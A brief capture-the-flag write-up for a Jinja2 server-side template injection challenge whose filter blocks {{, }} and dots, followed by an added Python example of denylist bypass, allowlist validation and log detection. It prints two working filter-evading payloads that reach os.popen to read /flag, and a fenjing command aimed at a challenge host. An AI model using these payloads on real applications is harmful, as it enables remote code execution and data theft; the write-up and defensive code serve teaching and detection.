Challenge link

The {{}} delimiters and the . character are filtered. Payload:

name={% set po=dict(po=a,p=b)|join%}
{% set a=(()|select|string|list)|attr(po)(24)%}
{% set ini=(a,a,dict(in=a,it=b)|join,a,a)|join()%}
{% set glo=(a,a,dict(glo=a,bals=b)|join,a,a)|join()%}
{% set cls=(a,a,dict(cla=a,ss=b)|join,a,a)|join()%}
{% set bs=(a,a,dict(bas=a,e=b)|join,a,a)|join()%}
{% set geti=(a,a,dict(get=a)|join,dict(item=a)|join,a,a)|join()%}
{% set subc=(a,a,dict(subcla=a,sses=b)|join,a,a)|join()%}
{%set pp=dict(pop=a,en=b)|join %}
{%print(()|attr(cls)|attr(bs)|attr(subc)()|attr(geti)(132)|attr(ini)|attr(glo)|attr(geti)(pp)('tac /flag')|attr('read')() )%}

Or:

{%set u='%c'%95*2%}{%print(''|attr(u+'cla''ss'+u)|attr(u+'ba''se'+u)|attr(u+'su''bcla''sses'+u)()|attr(213)|attr(u+'i''n''i''t'+u)|attr(u+'glo''bal''s'+u)|attr('ge''t')(u+'bui''lti''ns'+u)|attr('ge''t')(u+'imp''ort'+u)('o''s')|attr('po''pen')('ca''t /f''lag')|attr('re''ad')())%}

Or simply use fenjing: https://github.com/Marven11/Fenjing

$ pip3 install fenjing
$ python3 -m fenjing crack -u "http://node5.anna.nssctf.cn:28879/get_flag" -i "name"
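
An added example, not part of the original write-up: a Python sketch of why a denylist for {{, }} and . lets the statement-block payloads above through, set beside an allowlist for the name field and a log check for template syntax. The denylist model, the allowlist pattern, the GET-style log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Assumption: the filter rejects only these substrings, as the write-up states.
DENYLIST = ("{{", "}}", ".")

def denylist_allows(value: str) -> bool:
    """Model of the bypassed filter: True when the value passes it."""
    return not any(tok in value for tok in DENYLIST)

# Hypothetical allowlist for a display name: word characters, space, hyphen.
NAME_RE = re.compile(r"[\w \-]{1,64}")

def allowlist_allows(value: str) -> bool:
    """True only when the whole value is made of permitted characters."""
    return NAME_RE.fullmatch(value) is not None

# Jinja2 syntax that has no place in a name field: any opening or closing
# delimiter ({{ {% {# }} %} #}) or the attr filter, which replaces the dot.
SSTI_RE = re.compile(r"\{[{%#]|[%#}]\}|\|\s*attr\s*\(")

def flag_requests(log_lines):
    """Return (line_no, decoded value) for name= values that look like template code."""
    hits = []
    for no, line in enumerate(log_lines, 1):
        m = re.search(r'[?&]name=([^&\s"]*)', line)
        if m:
            value = unquote_plus(m.group(1))  # decode before matching
            if SSTI_RE.search(value):
                hits.append((no, value))
    return hits

# Constructed access-log lines (not taken from the challenge server).
SAMPLE_LOG = [
    '10.0.0.5 "GET /get_flag?name=alice HTTP/1.1" 200',
    '10.0.0.9 "GET /get_flag?name=%7B%25print(7*7)%25%7D HTTP/1.1" 200',
    '10.0.0.9 "GET /get_flag?name=%7B%25set+x%3D()%7Cattr(y)%25%7D HTTP/1.1" 200',
    '10.0.0.7 "GET /get_flag?name=Bob+Smith HTTP/1.1" 200',
]

if __name__ == "__main__":
    probe = "{%print(7*7)%}"  # harmless statement-block probe
    print("denylist passes probe:", denylist_allows(probe))
    print("allowlist passes probe:", allowlist_allows(probe))
    for no, value in flag_requests(SAMPLE_LOG):
        print(f"line {no}: template syntax in name: {value!r}")
```

Input filtering of either kind is defense in depth; the fix for SSTI is to pass name to the template as a render variable instead of concatenating it into the template source.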